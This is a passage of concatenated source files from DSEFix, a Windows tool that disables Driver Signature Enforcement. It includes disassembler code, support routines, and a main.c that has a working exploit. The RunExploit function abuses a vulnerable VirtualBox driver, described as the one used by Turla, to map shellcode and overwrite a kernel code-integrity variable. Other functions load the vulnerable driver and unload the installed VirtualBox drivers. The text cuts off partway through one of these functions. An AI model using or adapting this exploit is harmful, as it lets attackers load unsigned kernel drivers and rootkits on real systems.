|= F_DISP32; 279 | hs->disp.disp32 = *(uint32_t *)p; 280 | } 281 | p += disp_size; 282 | } else if (pref & PRE_LOCK) 283 | hs->flags |= F_ERROR | F_ERROR_LOCK; 284 | 285 | if (cflags & C_IMM_P66) { 286 | if (cflags & C_REL32) { 287 | if (pref & PRE_66) { 288 | hs->flags |= F_IMM16 | F_RELATIVE; 289 | hs->imm.imm16 = *(uint16_t *)p; 290 | p += 2; 291 | goto disasm_done; 292 | } 293 | goto rel32_ok; 294 | } 295 | if (op64) { 296 | hs->flags |= F_IMM64; 297 | hs->imm.imm64 = *(uint64_t *)p; 298 | p += 8; 299 | } else if (!(pref & PRE_66)) { 300 | hs->flags |= F_IMM32; 301 | hs->imm.imm32 = *(uint32_t *)p; 302 | p += 4; 303 | } else 304 | goto imm16_ok; 305 | } 306 | 307 | 308 | if (cflags & C_IMM16) { 309 | imm16_ok: 310 | hs->flags |= F_IMM16; 311 | hs->imm.imm16 = *(uint16_t *)p; 312 | p += 2; 313 | } 314 | if (cflags & C_IMM8) { 315 | hs->flags |= F_IMM8; 316 | hs->imm.imm8 = *p++; 317 | } 318 | 319 | if (cflags & C_REL32) { 320 | rel32_ok: 321 | hs->flags |= F_IMM32 | F_RELATIVE; 322 | hs->imm.imm32 = *(uint32_t *)p; 323 | p += 4; 324 | } else if (cflags & C_REL8) { 325 | hs->flags |= F_IMM8 | F_RELATIVE; 326 | hs->imm.imm8 = *p++; 327 | } 328 | 329 | disasm_done: 330 | 331 | if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) { 332 | hs->flags |= F_ERROR | F_ERROR_LENGTH; 333 | hs->len = 15; 334 | } 335 | 336 | return (unsigned int)hs->len; 337 | } 338 | #pragma warning(pop) 339 | -------------------------------------------------------------------------------- /Source/DSEFix/sup.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2015 - 2017 4 | * 5 | * TITLE: SUP.C 6 | * 7 | * VERSION: 1.22 8 | * 9 | * DATE: 01 Dec 2017 10 | * 11 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 12 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 13 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 14 | * PARTICULAR PURPOSE. 15 | * 16 | *******************************************************************************/ 17 | #include "global.h" 18 | 19 | /* 20 | * supCopyMemory 21 | * 22 | * Purpose: 23 | * 24 | * Copies bytes between buffers. 25 | * 26 | * dest - Destination buffer 27 | * cbdest - Destination buffer size in bytes 28 | * src - Source buffer 29 | * cbsrc - Source buffer size in bytes 30 | * 31 | */ 32 | void supCopyMemory( 33 | _Inout_ void *dest, 34 | _In_ size_t cbdest, 35 | _In_ const void *src, 36 | _In_ size_t cbsrc 37 | ) 38 | { 39 | char *d = (char*)dest; 40 | char *s = (char*)src; 41 | 42 | if ((dest == 0) || (src == 0) || (cbdest == 0)) 43 | return; 44 | if (cbdest < cbsrc) 45 | cbsrc = cbdest; 46 | 47 | while (cbsrc > 0) { 48 | *d++ = *s++; 49 | cbsrc--; 50 | } 51 | } 52 | 53 | /* 54 | * supGetSystemInfo 55 | * 56 | * Purpose: 57 | * 58 | * Returns buffer with system information by given InfoClass. 59 | * 60 | * Returned buffer must be freed with HeapFree after usage. 61 | * Function will return error after 100 attempts. 62 | * 63 | */ 64 | PVOID supGetSystemInfo( 65 | _In_ SYSTEM_INFORMATION_CLASS InfoClass 66 | ) 67 | { 68 | INT c = 0; 69 | PVOID Buffer = NULL; 70 | ULONG Size = 0x1000; 71 | NTSTATUS status; 72 | ULONG memIO; 73 | PVOID hHeap = NtCurrentPeb()->ProcessHeap; 74 | 75 | do { 76 | Buffer = RtlAllocateHeap(hHeap, HEAP_ZERO_MEMORY, (SIZE_T)Size); 77 | if (Buffer != NULL) { 78 | status = NtQuerySystemInformation(InfoClass, Buffer, Size, &memIO); 79 | } 80 | else { 81 | return NULL; 82 | } 83 | if (status == STATUS_INFO_LENGTH_MISMATCH) { 84 | RtlFreeHeap(hHeap, 0, Buffer); 85 | Buffer = NULL; 86 | Size *= 2; 87 | c++; 88 | if (c > 100) { 89 | status = STATUS_SECRET_TOO_LONG; 90 | break; 91 | } 92 | } 93 | } while (status == STATUS_INFO_LENGTH_MISMATCH); 94 | 95 | if (NT_SUCCESS(status)) { 96 | return Buffer; 97 | } 98 | 99 | if (Buffer) { 100 | RtlFreeHeap(hHeap, 0, Buffer); 101 | } 102 | return NULL; 103 | } 104 | 105 | /* 106 | * supBackupVBoxDrv 107 | * 108 | * Purpose: 109 | * 110 | * Backup virtualbox driver file if it already installed. 111 | * 112 | */ 113 | BOOL supBackupVBoxDrv( 114 | _In_ BOOL bRestore 115 | ) 116 | { 117 | BOOL bResult = FALSE; 118 | WCHAR szOldDriverName[MAX_PATH * 2]; 119 | WCHAR szNewDriverName[MAX_PATH * 2]; 120 | WCHAR szDriverDirName[MAX_PATH * 2]; 121 | 122 | if (!GetSystemDirectory(szDriverDirName, MAX_PATH)) { 123 | return FALSE; 124 | } 125 | 126 | _strcat(szDriverDirName, TEXT("\\drivers\\")); 127 | 128 | if (bRestore) { 129 | _strcpy(szOldDriverName, szDriverDirName); 130 | _strcat(szOldDriverName, TEXT("VBoxDrv.backup")); 131 | if (PathFileExists(szOldDriverName)) { 132 | _strcpy(szNewDriverName, szDriverDirName); 133 | _strcat(szNewDriverName, TEXT("VBoxDrv.sys")); 134 | bResult = MoveFileEx(szOldDriverName, szNewDriverName, 135 | MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); 136 | } 137 | } 138 | else { 139 | _strcpy(szOldDriverName, szDriverDirName); 140 | _strcat(szOldDriverName, TEXT("VBoxDrv.sys")); 141 | _strcpy(szNewDriverName, szDriverDirName); 142 | _strcat(szNewDriverName, TEXT("VBoxDrv.backup")); 143 | bResult = MoveFileEx(szOldDriverName, szNewDriverName, 144 | MOVEFILE_REPLACE_EXISTING | MOVEFILE_WRITE_THROUGH); 145 | } 146 | return bResult; 147 | } 148 | 149 | /* 150 | * supWriteBufferToFile 151 | * 152 | * Purpose: 153 | * 154 | * Create new file and write buffer to it. 155 | * 156 | */ 157 | DWORD supWriteBufferToFile( 158 | _In_ LPWSTR lpFileName, 159 | _In_ PVOID Buffer, 160 | _In_ DWORD BufferSize 161 | ) 162 | { 163 | HANDLE hFile; 164 | DWORD bytesIO; 165 | 166 | if ( 167 | (lpFileName == NULL) || 168 | (Buffer == NULL) || 169 | (BufferSize == 0) 170 | ) 171 | { 172 | return FALSE; 173 | } 174 | 175 | hFile = CreateFile(lpFileName, 176 | GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL); 177 | 178 | if (hFile == INVALID_HANDLE_VALUE) 179 | return FALSE; 180 | 181 | WriteFile(hFile, Buffer, BufferSize, &bytesIO, NULL); 182 | CloseHandle(hFile); 183 | 184 | return bytesIO; 185 | } 186 | 187 | /* 188 | * supDetectObjectCallback 189 | * 190 | * Purpose: 191 | * 192 | * Comparer callback routine used in objects enumeration. 193 | * 194 | */ 195 | NTSTATUS NTAPI supDetectObjectCallback( 196 | _In_ POBJECT_DIRECTORY_INFORMATION Entry, 197 | _In_ PVOID CallbackParam 198 | ) 199 | { 200 | POBJSCANPARAM Param = (POBJSCANPARAM)CallbackParam; 201 | 202 | if (Entry == NULL) { 203 | return STATUS_INVALID_PARAMETER_1; 204 | } 205 | 206 | if (CallbackParam == NULL) { 207 | return STATUS_INVALID_PARAMETER_2; 208 | } 209 | 210 | if (Param->Buffer == NULL || Param->BufferSize == 0) { 211 | return STATUS_MEMORY_NOT_ALLOCATED; 212 | } 213 | 214 | if (Entry->Name.Buffer) { 215 | if (_strcmpi_w(Entry->Name.Buffer, Param->Buffer) == 0) { 216 | return STATUS_SUCCESS; 217 | } 218 | } 219 | return STATUS_UNSUCCESSFUL; 220 | } 221 | 222 | /* 223 | * supEnumSystemObjects 224 | * 225 | * Purpose: 226 | * 227 | * Lookup object by name in given directory. 228 | * 229 | */ 230 | NTSTATUS NTAPI supEnumSystemObjects( 231 | _In_opt_ LPWSTR pwszRootDirectory, 232 | _In_opt_ HANDLE hRootDirectory, 233 | _In_ PENUMOBJECTSCALLBACK CallbackProc, 234 | _In_opt_ PVOID CallbackParam 235 | ) 236 | { 237 | BOOL cond = TRUE; 238 | ULONG ctx, rlen; 239 | HANDLE hDirectory = NULL; 240 | NTSTATUS status; 241 | NTSTATUS CallbackStatus; 242 | OBJECT_ATTRIBUTES attr; 243 | UNICODE_STRING sname; 244 | 245 | POBJECT_DIRECTORY_INFORMATION objinf; 246 | 247 | if (CallbackProc == NULL) { 248 | return STATUS_INVALID_PARAMETER_4; 249 | } 250 | 251 | status = STATUS_UNSUCCESSFUL; 252 | 253 | __try { 254 | 255 | // We can use root directory. 256 | if (pwszRootDirectory != NULL) { 257 | RtlSecureZeroMemory(&sname, sizeof(sname)); 258 | RtlInitUnicodeString(&sname, pwszRootDirectory); 259 | InitializeObjectAttributes(&attr, &sname, OBJ_CASE_INSENSITIVE, NULL, NULL); 260 | status = NtOpenDirectoryObject(&hDirectory, DIRECTORY_QUERY, &attr); 261 | if (!NT_SUCCESS(status)) { 262 | return status; 263 | } 264 | } 265 | else { 266 | if (hRootDirectory == NULL) { 267 | return STATUS_INVALID_PARAMETER_2; 268 | } 269 | hDirectory = hRootDirectory; 270 | } 271 | 272 | // Enumerate objects in directory. 273 | ctx = 0; 274 | do { 275 | 276 | rlen = 0; 277 | status = NtQueryDirectoryObject(hDirectory, NULL, 0, TRUE, FALSE, &ctx, &rlen); 278 | if (status != STATUS_BUFFER_TOO_SMALL) 279 | break; 280 | 281 | objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen); 282 | if (objinf == NULL) 283 | break; 284 | 285 | status = NtQueryDirectoryObject(hDirectory, objinf, rlen, TRUE, FALSE, &ctx, &rlen); 286 | if (!NT_SUCCESS(status)) { 287 | RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); 288 | break; 289 | } 290 | 291 | CallbackStatus = CallbackProc(objinf, CallbackParam); 292 | 293 | RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, objinf); 294 | 295 | if (NT_SUCCESS(CallbackStatus)) { 296 | status = STATUS_SUCCESS; 297 | break; 298 | } 299 | 300 | } while (cond); 301 | 302 | if (hDirectory != NULL) { 303 | NtClose(hDirectory); 304 | } 305 | 306 | } 307 | __except (EXCEPTION_EXECUTE_HANDLER) { 308 | status = STATUS_ACCESS_VIOLATION; 309 | } 310 | 311 | return status; 312 | } 313 | 314 | /* 315 | * supIsObjectExists 316 | * 317 | * Purpose: 318 | * 319 | * Return TRUE if the given object exists, FALSE otherwise. 320 | * 321 | */ 322 | BOOL supIsObjectExists( 323 | _In_ LPWSTR RootDirectory, 324 | _In_ LPWSTR ObjectName 325 | ) 326 | { 327 | OBJSCANPARAM Param; 328 | 329 | if (ObjectName == NULL) { 330 | return FALSE; 331 | } 332 | 333 | Param.Buffer = ObjectName; 334 | Param.BufferSize = (ULONG)_strlen(ObjectName); 335 | 336 | return NT_SUCCESS(supEnumSystemObjects(RootDirectory, NULL, supDetectObjectCallback, &Param)); 337 | } 338 | 339 | /* 340 | * supGetModuleBaseByName 341 | * 342 | * Purpose: 343 | * 344 | * Return module base address. 345 | * 346 | */ 347 | ULONG_PTR supGetModuleBaseByName( 348 | _In_ LPSTR ModuleName 349 | ) 350 | { 351 | ULONG_PTR ReturnAddress = 0; 352 | ULONG i, k; 353 | PRTL_PROCESS_MODULES miSpace; 354 | 355 | miSpace = supGetSystemInfo(SystemModuleInformation); 356 | if (miSpace != NULL) { 357 | for (i = 0; i < miSpace->NumberOfModules; i++) { 358 | k = miSpace->Modules[i].OffsetToFileName; 359 | if (_strcmpi_a( 360 | (CONST CHAR*)&miSpace->Modules[i].FullPathName[k], 361 | ModuleName) == 0) 362 | { 363 | ReturnAddress = (ULONG_PTR)miSpace->Modules[i].ImageBase; 364 | break; 365 | } 366 | } 367 | RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace); 368 | } 369 | return ReturnAddress; 370 | } 371 | 372 | /* 373 | * supMapFile 374 | * 375 | * Purpose: 376 | * 377 | * Map file into memory and return pointer to section describing mapping. 378 | * Caller free memory with NtUnmapViewOfSection after use. 379 | * 380 | */ 381 | PVOID supMapFile( 382 | _In_ LPWSTR lpFileName, 383 | _Out_ PSIZE_T VirtualSize 384 | ) 385 | { 386 | BOOLEAN bCond = FALSE, bSuccess = FALSE; 387 | NTSTATUS status; 388 | HANDLE hFile = NULL, hSection = NULL; 389 | PBYTE DllBase = NULL; 390 | SIZE_T DllVirtualSize; 391 | OBJECT_ATTRIBUTES attr; 392 | UNICODE_STRING usFileName; 393 | IO_STATUS_BLOCK iosb; 394 | 395 | RtlSecureZeroMemory(&usFileName, sizeof(usFileName)); 396 | 397 | if (VirtualSize) 398 | *VirtualSize = 0; 399 | 400 | do { 401 | 402 | if (!RtlDosPathNameToNtPathName_U(lpFileName, &usFileName, NULL, NULL)) { 403 | SetLastError(ERROR_INVALID_PARAMETER); 404 | break; 405 | } 406 | 407 | InitializeObjectAttributes(&attr, &usFileName, 408 | OBJ_CASE_INSENSITIVE, NULL, NULL); 409 | RtlSecureZeroMemory(&iosb, sizeof(iosb)); 410 | 411 | status = NtCreateFile(&hFile, SYNCHRONIZE | FILE_READ_DATA, 412 | &attr, &iosb, NULL, 0, FILE_SHARE_READ, FILE_OPEN, 413 | FILE_SYNCHRONOUS_IO_NONALERT, NULL, 0); 414 | 415 | if (!NT_SUCCESS(status)) { 416 | SetLastError(RtlNtStatusToDosError(status)); 417 | break; 418 | } 419 | 420 | status = NtCreateSection(&hSection, SECTION_ALL_ACCESS, NULL, 421 | NULL, PAGE_READONLY, SEC_IMAGE, hFile); 422 | if (!NT_SUCCESS(status)) { 423 | SetLastError(RtlNtStatusToDosError(status)); 424 | break; 425 | } 426 | 427 | DllBase = NULL; 428 | DllVirtualSize = 0; 429 | status = NtMapViewOfSection(hSection, NtCurrentProcess(), &DllBase, 430 | 0, 0, NULL, &DllVirtualSize, ViewUnmap, 0, PAGE_READONLY); 431 | if (!NT_SUCCESS(status)) { 432 | SetLastError(RtlNtStatusToDosError(status)); 433 | break; 434 | } 435 | 436 | bSuccess = TRUE; 437 | 438 | if (VirtualSize) 439 | *VirtualSize = DllVirtualSize; 440 | 441 | } while (bCond); 442 | 443 | if (usFileName.Buffer != NULL) 444 | RtlFreeUnicodeString(&usFileName); 445 | 446 | if (hSection != NULL) 447 | NtClose(hSection); 448 | 449 | if (hFile != NULL) 450 | NtClose(hFile); 451 | 452 | if (bSuccess == FALSE) { 453 | if (DllBase != NULL) 454 | NtUnmapViewOfSection(NtCurrentProcess(), DllBase); 455 | } 456 | 457 | return DllBase; 458 | } 459 | -------------------------------------------------------------------------------- /Source/DSEFix/main.c: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2014 - 2017 4 | * 5 | * TITLE: MAIN.C 6 | * 7 | * VERSION: 1.22 8 | * 9 | * DATE: 01 Dec 2017 10 | * 11 | * Codename: Aoba 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 17 | * 18 | *******************************************************************************/ 19 | 20 | #include "global.h" 21 | #include "vboxdrv.h" 22 | 23 | #pragma data_seg("shrd") 24 | volatile LONG g_lApplicationInstances = 0; 25 | #pragma data_seg() 26 | #pragma comment(linker, "/Section:shrd,RWS") 27 | 28 | HINSTANCE g_hInstance; 29 | HANDLE g_ConOut = NULL; 30 | HANDLE g_hVBox = INVALID_HANDLE_VALUE; 31 | BOOL g_ConsoleOutput = FALSE; 32 | BOOL g_VBoxInstalled = FALSE; 33 | WCHAR g_BE = 0xFEFF; 34 | 35 | RTL_OSVERSIONINFOW g_osv; 36 | 37 | 38 | #define VBoxDrvSvc TEXT("VBoxDrv") 39 | #define supImageName "aoba" 40 | #define supImageHandle 0x1a000 41 | 42 | // we don't care about modified Windows startup 43 | 44 | #define NTOSKRNL_EXE "ntoskrnl.exe" 45 | #define CI_DLL "ci.dll" 46 | 47 | #define T_PROGRAMTITLE TEXT("DSEFix v1.2.2 (01 Dec 2017)") 48 | #define T_PROGRAMUNSUP TEXT("Unsupported WinNT version\r\n") 49 | #define T_PROGRAMRUN TEXT("Another instance running, close it before\r\n") 50 | #define T_PROGRAMUSAGE TEXT("Usage: dsefix [-e]\r\n") 51 | #define T_PROGRAMINTRO TEXT("DSEFix v1.2.2 started\r\n(c) 2014 - 2017 DSEFix Project\r\nSupported x64 OS : 7 and above\r\n") 52 | 53 | /* 54 | ** Disable DSE (Vista and above) 55 | ** xor rax, rax 56 | ** ret 57 | */ 58 | const unsigned char scDisable[] = { 59 | 0x48, 0x31, 0xc0, 0xc3 60 | }; 61 | 62 | /* 63 | ** Enable DSE (Vista and Seven) 64 | ** xor rax, rax 65 | ** mov al, 1 66 | ** ret 67 | */ 68 | const unsigned char scEnableVista7[] = { 69 | 0x48, 0x31, 0xc0, 0xb0, 0x01, 0xc3 70 | }; 71 | 72 | /* 73 | ** Enable DSE (W8 and above) 74 | ** xor rax, rax 75 | ** mov al, 6 76 | ** ret 77 | */ 78 | const unsigned char scEnable8Plus[] = { 79 | 0x48, 0x31, 0xc0, 0xb0, 0x06, 0xc3 80 | }; 81 | 82 | 83 | /* 84 | * RunExploit 85 | * 86 | * Purpose: 87 | * 88 | * Execute VirtualBox exploit used by WinNT/Turla. 89 | * 90 | */ 91 | void RunExploit( 92 | _In_ ULONG_PTR g_CiAddress, 93 | _In_ LPVOID Shellcode, 94 | _In_ ULONG CodeSize 95 | ) 96 | { 97 | SUPCOOKIE Cookie; 98 | SUPLDROPEN OpenLdr; 99 | DWORD bytesIO = 0, BufferSize; 100 | RTR0PTR ImageBase = NULL; 101 | PSUPLDRLOAD pLoadTask = NULL; 102 | SUPSETVMFORFAST vmFast; 103 | SUPLDRFREE ldrFree; 104 | SIZE_T memIO; 105 | WCHAR text[256]; 106 | 107 | while (g_hVBox != INVALID_HANDLE_VALUE) { 108 | 109 | BufferSize = CodeSize + 0x1000; 110 | 111 | RtlSecureZeroMemory(&Cookie, sizeof(SUPCOOKIE)); 112 | Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE; 113 | Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN; 114 | Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT; 115 | Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; 116 | Cookie.Hdr.rc = 0; 117 | Cookie.u.In.u32ReqVersion = 0; 118 | Cookie.u.In.u32MinVersion = 0x00070002; 119 | RtlCopyMemory(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC, sizeof(SUPCOOKIE_MAGIC)); 120 | 121 | if (!DeviceIoControl(g_hVBox, SUP_IOCTL_COOKIE, 122 | &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie, 123 | SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) 124 | { 125 | cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), g_ConsoleOutput, TRUE); 126 | break; 127 | } 128 | 129 | RtlSecureZeroMemory(&OpenLdr, sizeof(OpenLdr)); 130 | OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; 131 | OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; 132 | OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN; 133 | OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT; 134 | OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; 135 | OpenLdr.Hdr.rc = 0; 136 | OpenLdr.u.In.cbImage = BufferSize; 137 | RtlCopyMemory(OpenLdr.u.In.szName, supImageName, sizeof(supImageName)); 138 | 139 | if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_OPEN, &OpenLdr, 140 | SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr, 141 | SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) 142 | { 143 | cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE); 144 | break; 145 | } 146 | else { 147 | _strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x")); 148 | u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text)); 149 | cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); 150 | } 151 | 152 | ImageBase = OpenLdr.u.Out.pvImageBase; 153 | 154 | memIO = BufferSize; 155 | NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO, 156 | MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 157 | 158 | if (pLoadTask == NULL) 159 | break; 160 | 161 | pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie; 162 | pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; 163 | pLoadTask->Hdr.cbIn = 164 | (ULONG_PTR)(&((PSUPLDRLOAD)0)->u.In.achImage) + BufferSize; 165 | pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT; 166 | pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC; 167 | pLoadTask->Hdr.rc = 0; 168 | pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0; 169 | pLoadTask->u.In.pvImageBase = ImageBase; 170 | pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)supImageHandle; 171 | pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = ImageBase; 172 | pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = ImageBase; 173 | pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = ImageBase; 174 | RtlCopyMemory(pLoadTask->u.In.achImage, Shellcode, BufferSize - 0x1000); 175 | pLoadTask->u.In.cbImage = BufferSize; 176 | 177 | if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_LOAD, 178 | pLoadTask, pLoadTask->Hdr.cbIn, 179 | pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL)) 180 | { 181 | cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE); 182 | break; 183 | } 184 | else { 185 | _strcpy(text, TEXT("Ldr: SUP_IOCTL_LDR_LOAD, success\r\n\tShellcode mapped at 0x")); 186 | u64tohex((ULONG_PTR)ImageBase, _strend(text)); 187 | _strcat(text, TEXT(", size = 0x")); 188 | ultohex(CodeSize, _strend(text)); 189 | } 190 | 191 | RtlSecureZeroMemory(&vmFast, sizeof(vmFast)); 192 | vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; 193 | vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; 194 | vmFast.Hdr.rc = 0; 195 | vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; 196 | vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN; 197 | vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT; 198 | vmFast.u.In.pVMR0 = (LPVOID)supImageHandle; 199 | 200 | if (!DeviceIoControl(g_hVBox, SUP_IOCTL_SET_VM_FOR_FAST, 201 | &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN, 202 | &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, &bytesIO, NULL)) 203 | { 204 | cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call failed"), g_ConsoleOutput, TRUE); 205 | break; 206 | } 207 | else { 208 | cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_SET_VM_FOR_FAST call complete"), g_ConsoleOutput, TRUE); 209 | } 210 | 211 | cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_FAST_DO_NOP"), g_ConsoleOutput, TRUE); 212 | 213 | _strcpy(text, TEXT("Ldr: Modifying value at address 0x")); 214 | u64tohex((ULONG_PTR)g_CiAddress, _strend(text)); 215 | cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); 216 | 217 | DeviceIoControl(g_hVBox, SUP_IOCTL_FAST_DO_NOP, 218 | (LPVOID)g_CiAddress, 0, 219 | (LPVOID)g_CiAddress, 0, 220 | &bytesIO, NULL); 221 | 222 | cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_FREE"), g_ConsoleOutput, TRUE); 223 | 224 | RtlSecureZeroMemory(&ldrFree, sizeof(ldrFree)); 225 | ldrFree.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; 226 | ldrFree.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; 227 | ldrFree.Hdr.cbIn = SUP_IOCTL_LDR_FREE_SIZE_IN; 228 | ldrFree.Hdr.cbOut = SUP_IOCTL_LDR_FREE_SIZE_OUT; 229 | ldrFree.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; 230 | ldrFree.Hdr.rc = 0; 231 | ldrFree.u.In.pvImageBase = ImageBase; 232 | 233 | DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_FREE, 234 | &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_IN, 235 | &ldrFree, SUP_IOCTL_LDR_FREE_SIZE_OUT, &bytesIO, NULL); 236 | 237 | break; 238 | } 239 | 240 | if (pLoadTask != NULL) { 241 | memIO = 0; 242 | NtFreeVirtualMemory(NtCurrentProcess(), &pLoadTask, &memIO, MEM_RELEASE); 243 | } 244 | 245 | if (g_hVBox != INVALID_HANDLE_VALUE) { 246 | CloseHandle(g_hVBox); 247 | g_hVBox = INVALID_HANDLE_VALUE; 248 | } 249 | } 250 | 251 | /* 252 | * IsVBoxInstalled 253 | * 254 | * Purpose: 255 | * 256 | * Check VirtualBox software installation state. 257 | * 258 | */ 259 | BOOL IsVBoxInstalled( 260 | VOID 261 | ) 262 | { 263 | BOOL bPresent = FALSE; 264 | LRESULT lRet; 265 | HKEY hKey = NULL; 266 | 267 | lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), 268 | 0, KEY_READ, &hKey); 269 | 270 | bPresent = (hKey != NULL); 271 | 272 | if (hKey) { 273 | RegCloseKey(hKey); 274 | } 275 | 276 | return bPresent; 277 | } 278 | 279 | /* 280 | * StartVulnerableDriver 281 | * 282 | * Purpose: 283 | * 284 | * Load vulnerable virtualbox driver and return handle for it device. 285 | * 286 | */ 287 | HANDLE StartVulnerableDriver( 288 | VOID 289 | ) 290 | { 291 | BOOL bCond = FALSE; 292 | PBYTE DrvBuffer; 293 | ULONG DataSize = 0, bytesIO; 294 | HANDLE hDevice = INVALID_HANDLE_VALUE; 295 | WCHAR szDriverFileName[MAX_PATH * 2]; 296 | SC_HANDLE schSCManager = NULL; 297 | LPWSTR msg; 298 | 299 | DrvBuffer = VBoxDrv; 300 | DataSize = sizeof(VBoxDrv); 301 | 302 | do { 303 | 304 | RtlSecureZeroMemory(szDriverFileName, sizeof(szDriverFileName)); 305 | if (!GetSystemDirectory(szDriverFileName, MAX_PATH)) { 306 | 307 | cuiPrintText(g_ConOut, 308 | TEXT("Ldr: Error loading VirtualBox driver, GetSystemDirectory failed"), 309 | g_ConsoleOutput, TRUE); 310 | 311 | break; 312 | } 313 | 314 | schSCManager = OpenSCManager(NULL, 315 | NULL, 316 | SC_MANAGER_ALL_ACCESS 317 | ); 318 | if (schSCManager == NULL) { 319 | cuiPrintText(g_ConOut, 320 | TEXT("Ldr: Error opening SCM database"), 321 | g_ConsoleOutput, TRUE); 322 | 323 | break; 324 | } 325 | 326 | // 327 | // Lookup main vbox driver device, 328 | // if found then try to unload all possible vbox drivers, 329 | // where unload order is sensitive because some vbox drivers depends on each other. 330 | // 331 | if (supIsObjectExists(L"\\Device", L"VBoxDrv")) { 332 | cuiPrintText(g_ConOut, 333 | TEXT("Ldr: Active VirtualBox found in system, attempt unload it"), 334 | g_ConsoleOutput, TRUE); 335 | 336 | if (scmStopDriver(schSCManager, TEXT("VBoxNetAdp"))) { 337 | cuiPrintText(g_ConOut, 338 | TEXT("SCM: VBoxNetAdp driver unloaded"), 339 | g_ConsoleOutput, TRUE); 340 | } 341 | if (scmStopDriver(schSCManager, TEXT("VBoxNetLwf"))) { 342 | cuiPrintText(g_ConOut, 343 | TEXT("SCM: VBoxNetLwf driver unloaded"), 344 | g_ConsoleOutput, TRUE); 345 | } 346 | if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) { 347 | cuiPrintText(g_ConOut, 348 | TEXT("SCM: VBoxUSBMon driver unloaded"), 349 | g_ConsoleOutput, TRUE); 350 | } 351 | Sleep(1000); 352 | if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) { 353 | cuiPrintText(g_ConOut, 354 | TEXT("SCM: VBoxDrv driver unloaded"), 355 | g_ConsoleOutput, 